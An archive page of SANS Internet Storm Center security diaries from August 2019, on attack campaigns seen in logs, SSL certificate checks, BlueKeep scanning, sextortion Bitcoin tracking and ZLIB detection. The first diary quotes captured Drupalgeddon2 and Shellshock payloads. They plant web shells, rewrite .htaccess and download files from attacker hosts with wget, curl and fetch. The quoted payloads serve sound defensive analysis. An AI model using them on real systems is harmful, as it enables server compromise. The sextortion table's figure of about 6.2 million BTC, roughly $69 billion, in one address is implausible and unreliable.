Archive for August, 2019

[Guest Diary] The good, the bad and the non-functional, or "how not to do an attack campaign", (Thu, Aug 8th)

[This is a guest diary submitted by Jan Kopriva]

Probably anyone who deals with security analysis of logs, PCAPs or other artifacts on a daily basis has come across some strange or funny texts, payloads or messages in them.

Sometimes, these unusual texts are intended as jokes (such as the "DELETE your logs" poem which was logged by a large number of HTTP servers back in 2015 [1]), while at other times they may be connected with malicious activity. If you have an IPS/IDS deployed in front of your web servers, you've no doubt seen logs of HTTP GET requests for the path "/". Although these requests might seem funny, they are an indicator of a potential attack, since they are generated by the ZmEu scanner, which is often used in campaigns targeting servers with phpMyAdmin installed.

While certain benign-looking requests, such as the ones generated by ZmEu, might indicate malicious activity, sometimes the opposite is true as well. Couple of times this year, we’ve noticed untargeted attempts at exploiting vulnerabilities on web servers with the intent to inform administrators about the need to patch the software they’re running.

Some of these warning activities were "grey" in their nature at best. This was the case with one example from March 2019, where the message to an administrator of a WordPress site was followed by an attempt to exfiltrate data from the targeted server.

Other attempts at warning the administrators, however, seemed to be well-intentioned, if not strictly ethical. A good example might be a campaign targeting Drupal sites vulnerable to CVE-2018-7600 (i.e. the "Drupalgeddon2" vulnerability), which was active in March and April of this year, and in which its authors tried to get the message across by creating a file on the server named vuln.htm containing the text "Vuln!! patch it Now!".

When decoded (and with line breaks added), the POST data look like this:

mail[#markup]=echo Vuln!! patch it Now!> vuln.htm&

Unfortunately, it seems that some not-so-well-intentioned actors took inspiration from this, as a similar campaign appeared in April, in which its authors tried to create the same file with the same content on the targeted server. At the same time, however, they also tried to create a couple of web shells named vuln.php, modify the .htaccess file and download another PHP file to the server.

When decoded (and again slightly modified), the parameters in the request look like this:

name[#type]=markup&name[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; 
echo 'Vuln!!'> sites/default/files/vuln.php; 
echo 'Vuln!!'> vuln.php; cd sites/default/files/; 
echo 'AddType application/x-httpd-php .jpg' > .htaccess; 
wget 'http://domain_redacted/Deutsch/images/up.php'
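The decoding step itself is a one-liner in most languages. As a minimal Python sketch (the payload below is a shortened, URL-encoded reconstruction of the harmless "warning" part only, not the exact captured request):

```python
from urllib.parse import parse_qs

# URL-encoded POST body of the kind used in the Drupalgeddon2 "warning"
# campaign (shortened to the first echo command for illustration)
body = ("name%5B%23type%5D=markup&name%5B%23markup%5D="
        "echo%20%27Vuln%21%21%20patch%20it%20Now%21%27%20%3E%20vuln.htm")

# parse_qs URL-decodes both the parameter names and their values
params = parse_qs(body)
for key, values in params.items():
    print(key, "=", values[0])
```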

The unfortunate fact that, in this case, a malicious actor managed to create something damaging from something intended to be benign and possibly even helpful reminded me of an interesting campaign where the opposite was true, and where the relevant logs and PCAPs were both strange and funny.

In this campaign, which we detected between July 23, 2016, and August 4, 2016, its author tried to target web servers vulnerable to Shellshock using HTTP GET requests with a payload placed in the User-Agent header. So far nothing unusual.

What made this campaign stand out was that its author seemed to have reused someone else's code in an incorrect fashion. The payload code was straightforward and appeared to be intended to download a malicious file from the attacker's domain to the targeted server. However, the actor behind the campaign probably made a mistake while modifying the placeholders in the code, where his own domain should have been, which resulted in something quite unexpected…

The relevant part of payload (slightly modified) looks like this:

system("wget http://ip_redacted/YOUR_URL_HERE ;
curl -O http://ip_redacted/YOUR_URL_HERE ;
fetch http://ip_redacted/YOUR_URL_HERE");

It probably won't come as a surprise that the path /YOUR_URL_HERE on the attacker's server (all requests seen contained the same IP address for this server) didn't point to any file, and attempts to access it resulted in an HTTP 404 code. That meant that even if a vulnerable server was targeted, the payload wouldn't be able to download any malicious files to it.

Someone mentioned a theory to me at the time that it might have been an original promotional campaign for a botnet for hire (i.e. "As you may see, I have this active botnet which may be used to spread malware – YOUR URL could be HERE"). However, this seems quite unlikely, and a far more probable explanation is that the malicious actor simply made an error.

Although this isn’t the only malicious campaign where an attacker seems to have made a simple mistake like this, the fact that it ran for almost two weeks in this broken state makes it quite unusual…and one of the best examples I’ve ever seen of how not to do an attack campaign.



(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


Verifying SSL/TLS configuration (part 2), (Wed, Aug 7th)

This diary is the second part in the series on verifying SSL/TLS configuration – penetration testers, but also security auditors should find this series really useful (let us know if you like it, or if there is another related topic you think should be covered).

In this part we will talk about checking the certificates used on SSL/TLS services, while the next one will cover ciphers. In the previous part I showed a couple of tools I like to use when testing SSL/TLS configuration.

As I mentioned, one of my favorite tools for checking SSL/TLS configuration is nmap, with some really useful NSE scripts. The one I use for checking certificates is the ssl-cert script. This script is very easy to use and will show us basically all the information we need to know, as shown below:

$ nmap -sT -p 443 -Pn --script ssl-cert
Starting Nmap 7.70SVN ( ) at 2019-08-07 09:38 UTC
Nmap scan report for (
Host is up (0.085s latency).

443/tcp open  https
| ssl-cert: Subject:
| Subject Alternative Name:,,,,,
| Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-07-16T13:52:00
| Not valid after:  2019-10-14T13:52:00
| MD5:   6c32 54b2 b168 29de fd51 3955 0789 b46d
|_SHA-1: c714 a765 b0bc 5770 78b5 2e33 0dee 4cc0 de80 c879

Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds

These are the important fields that we should pay attention to when verifying certificates, so let's explain them:

  • The Not valid before and Not valid after fields define the time interval in which the certificate is valid. Obviously, when verifying certificates we should make sure that the certificate is currently valid and not expired; otherwise an error will be presented.
  • The Issuer field defines who issued the certificate. This should be a well-known, trusted Certificate Authority – in this example we can see that the site is using Let's Encrypt, which is a free CA (another reason to encrypt everything today!).
    We could verify the trust chain now and find that this is a trusted CA – just keep in mind that if you are performing this test on an internal network, you should ask the client, before starting the penetration test, to specify which internal CAs they use – these should be trusted, of course.
    Additionally, if you are using automated vulnerability scanners such as Nexpose, Nessus or Qualys, with most of them you can import the list of trusted CAs. This will help with reducing false positives.
  • The Subject field defines the web site for which the certificate has been issued. The parameter we are interested in is the cn (commonName) parameter, and it must exactly match the target site name (what is entered in the address bar of a browser).
    That being said, I must also stress that modern web browsers have deprecated the cn parameter in the Subject field and now require an additional field: Subject Alternative Name (SAN), which must be present and must match the site name. As we can see in the output above, the certificate correctly sets that field as well. A lot of browsers will report an incorrect certificate if that field does not exist – for example, Google Chrome requires a SAN from version 58 onwards. In other words, make sure that you verify that the SAN field is there and that it is set correctly.
    Notice here that if the Subject and Issuer fields are the same, we are looking at a self-signed certificate; if they differ but the issuer is not a trusted CA, it is an untrusted certificate. I wanted to stress this specifically because I see a lot of reports (even from vulnerability scanners!) that confuse the two.
  • The public key type and size for this certificate are set to RSA and 2048 bits. This is (currently) the de facto standard – anything lower than 2048 bits is not considered safe and will be reported by modern browsers. So when you see a certificate with 1024 bits, that should be reported and a new one should be generated.
  • Finally, the signature algorithm: today it should always be SHA-256 (as we can see above, it is set to sha256WithRSAEncryption). MD5 and SHA-1 are not considered safe any more and should be avoided; Google Chrome stopped supporting SHA-1 in version 57.

With this we know how to read the output of the ssl-cert script, so we can report on any issues identified.
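If you prefer to script these checks, the same fields are available from Python's ssl module. The sketch below (my own, not from the diary) reduces the dictionary returned by SSLSocket.getpeercert() to the fields discussed above:

```python
import socket
import ssl
from datetime import datetime, timezone

def summarize_cert(cert: dict) -> dict:
    """Reduce an SSLSocket.getpeercert() dict to the fields discussed above."""
    subject = {k: v for rdn in cert.get("subject", ()) for k, v in rdn}
    issuer = {k: v for rdn in cert.get("issuer", ()) for k, v in rdn}
    san = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    # notAfter uses the fixed format "Oct 14 13:52:00 2019 GMT"
    not_after = datetime.strptime(cert["notAfter"], "%b %d %H:%M:%S %Y %Z")
    return {
        "cn": subject.get("commonName"),
        "issuer_cn": issuer.get("commonName"),
        "san": san,
        "expired": not_after.replace(tzinfo=timezone.utc) < datetime.now(timezone.utc),
    }

def fetch_cert(host: str, port: int = 443) -> dict:
    """Connect with default verification and return the peer certificate."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()
```

Note that with a default context, an untrusted or self-signed certificate will already raise an SSLCertVerificationError during the handshake, so this sketch only summarizes certificates that passed the trust-chain check.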

In the next diary we will talk about the encryption algorithms and protocols that we need to pay attention to.



Scanning for Bluekeep vulnerable RDP instances, (Mon, Aug 5th)

Since the Microsoft Remote Desktop Protocol (RDP) vulnerability CVE-2019-0708, commonly known as BlueKeep, was first announced in May of 2019, the security industry has been holding its breath waiting for the worst-case scenario. Scanning for vulnerable RDP instances began almost immediately after the announcement. Since then a number of exploits for BlueKeep have been seen that can crash vulnerable systems, but the anticipated wormable exploit hasn't yet materialized.

Now that both Immunity's Canvas and Rapid7's Metasploit have working BlueKeep exploits in their penetration testing tools, you have to believe that it is only a matter of time until the bad guys have one as well.

It would be nice to say that the number of systems running a vulnerable RDP instance has decreased since the vulnerability announcement, but for the IP space I have been tracking I have only seen a decrease of about 10% in vulnerable systems over the last 90 days.

If you are a security administrator and want to find the BlueKeep-vulnerable systems on your network, how would you go about it? For the BlueKeep vulnerability it is relatively easy: with access to a *nix box with the high-speed scanner masscan and the rdpscan tool installed, along with their dependencies, it takes only a very simple bash script.

The bash script I used looks like this:


#!/bin/bash
# create a date stamp for the output file names so scans run on different
# dates don't overwrite each other
TDATE=`date +%Y%m%d`
# put the IPs or IP ranges you would like to scan in scan_ips.txt;
# this will be used as the input to masscan
# the masscan output file is rdpips-$TDATE.txt
echo "executing masscan"
/usr/bin/masscan -p3389 -v -iL scan_ips.txt > rdpips-$TDATE.txt
# the output from masscan will be used as the input to rdpscan
# the rdpscan output file will be RDP_results-$TDATE.txt
echo "executing rdpscan"
rdpscan --file rdpips-$TDATE.txt > RDP_results-$TDATE.txt


As the comments state, place the IP addresses or ranges to be scanned in the file scan_ips.txt; this will be used as the input for the script. The output will be two files:

* The masscan output file, rdpips-$TDATE.txt, listing all IPs found with RDP open on port 3389
* The rdpscan output file, RDP_results-$TDATE.txt, showing each detected RDP instance and whether or not rdpscan believes it is vulnerable to BlueKeep

Checking the rdpscan output in RDP_results-$TDATE.txt you will generally find one of three results:

* SAFE – Target appears patched
* VULNERABLE – got appid
* UNKNOWN – usually either "RDP protocol error – receive timeout" or "no connection – connection closed (RST)"
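To get a quick summary out of a large results file, the status keywords are easy to bucket. A small Python sketch (the exact rdpscan output format may vary between versions, so treat this as illustrative):

```python
import re

def triage(lines):
    """Bucket rdpscan result lines by their status keyword."""
    buckets = {"SAFE": [], "VULNERABLE": [], "UNKNOWN": []}
    for line in lines:
        match = re.search(r"\b(SAFE|VULNERABLE|UNKNOWN)\b", line)
        if match:
            buckets[match.group(1)].append(line.strip())
    return buckets

# hypothetical result lines in the format described above
results = [
    " - SAFE - Target appears patched",
    " - VULNERABLE - got appid",
    " - UNKNOWN - no connection - connection closed (RST)",
]
for status, hosts in triage(results).items():
    print(status, len(hosts))
```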

Concentrate on resolving the VULNERABLE results and you will sleep much better when the wormable exploit finally hits.


— Rick Wanner MSISE – rwanner at isc dot sans dot edu – – Twitter:namedeplume (Protected)


Sextortion: Follow the Money – The Final Chapter, (Mon, Aug 5th)

For the background on this diary please see the previous diaries on Sextortion: Follow the Money: Diary 1, Diary 2, Diary 3

Since the last update in the Sextortion series I have continued to track the bitcoin addresses reported to the ISC. Altogether 563 BTC addresses have been reported. 90 of those addresses received 497 payments, totalling over $785,000 USD – an average payment of nearly $1600 USD at current Bitcoin prices. Over $530,000 USD of that value has been moved out of the tracked addresses, leaving about $250,000 USD still sitting in them.

I still believe that the addresses we are tracking are a very small percentage of the overall addresses used in the various sextortion campaigns, but even these addresses received, and moved out, a not insignificant amount of value.

As shown in Diary 3, at that point it was possible to track over $40 Million USD of payments being sent into Bitcoin mixers to have the payments laundered for extraction, and that was only a small portion of the value in the consolidation addresses. The rest had not moved out yet, leaving over $100 Million USD behind, presumably to be moved later.

Unfortunately, shortly after that diary was published, the bad guys got more creative with the way they moved value out of the BTC wallets, breaking the tools I was using to find the consolidation wallets. It appeared as if they were consolidating the value in new addresses, fragmenting it again, reconsolidating, and so on, in order to make it far more difficult to follow where the value was going.

Still, with some patience, I was able to track some of the BTC value to some consolidation wallets, and the dollar values are truly frightening. Keep in mind that I cannot attribute all of the value in these consolidation BTC addresses to the sextortion campaigns; all I can be sure of is that the money from some of the sextortion BTC addresses was moved into these addresses, so presumably it belongs to the same criminal enterprise that was running the campaigns. Also, the value is based on the current price of Bitcoin; with the volatility of Bitcoin, the actual value may have been more or less at the time it was moved out. Some of these consolidation BTC addresses appear to still be in use – the values in them were changing as I was writing this diary.

Here are the top 5 consolidation BTC addresses by value that I could find:

Consolidation Address Total BTC Total USD
39id1GfYff4x5r7UEALUjPYVQPGuMj5L1g 61.93172327 $683,881.05
3QR7FADzk6U227eJ3Ud1vxzmh4HNWpnbgp 140.1842615 $1,547,984.71
1DX3MvGTanzcTgnHw8SnorhgpQNHspSWTX 655.84167 $7,242,131.68
179KLpQM8Mse6MmG5gk6JTSokQohiGGrbh 6,437.50 $71,086,105.01
1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s 6,229,301.73 $68,787,064,396.14

Like I said, a truly frightening number…almost $69 Billion USD! It is important to remember that these consolidation addresses are only the ones I was able to find using our very limited set of tracked sextortion BTC addresses; there are very likely many more consolidation addresses in use.

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – – Twitter:namedeplume (Protected)


Detecting ZLIB Compression, (Sun, Aug 4th)

In the diary entry "Recognizing ZLIB Compression", I mention that my tool is mainly a wrapper for the file command (libmagic).

By default, the file command has no definitions to detect ZLIB compression, but my tool uses an additional file with custom definitions.

Take, for example, a ZLIB compressed stream in a PDF document. Such a stream starts with 0x78, an indication that this is ZLIB compression.
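The same heuristic is easy to reproduce: per RFC 1950, the first byte of a ZLIB header is the CMF byte (0x78 for deflate with a 32K window, by far the most common case), and the two header bytes, read as a big-endian number, are divisible by 31. A minimal Python sketch of that check (like the diary, it only flags the common 0x78 case):

```python
import zlib

def looks_like_zlib(data: bytes) -> bool:
    """Heuristic ZLIB header check (RFC 1950): CMF byte 0x78 (deflate,
    32K window) and the two-byte header divisible by 31."""
    if len(data) < 2 or data[0] != 0x78:
        return False
    return (data[0] * 256 + data[1]) % 31 == 0

# a real ZLIB stream passes, arbitrary bytes do not
print(looks_like_zlib(zlib.compress(b"a ZLIB compressed stream")))
print(looks_like_zlib(b"%PDF-1.7"))
```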

Piping this stream into my tool helps identify the unfiltered stream content.

Of course, if you don't want to use this tool, you can just integrate these ZLIB definitions into your own definition files.

Didier Stevens
Senior handler
Microsoft MVP
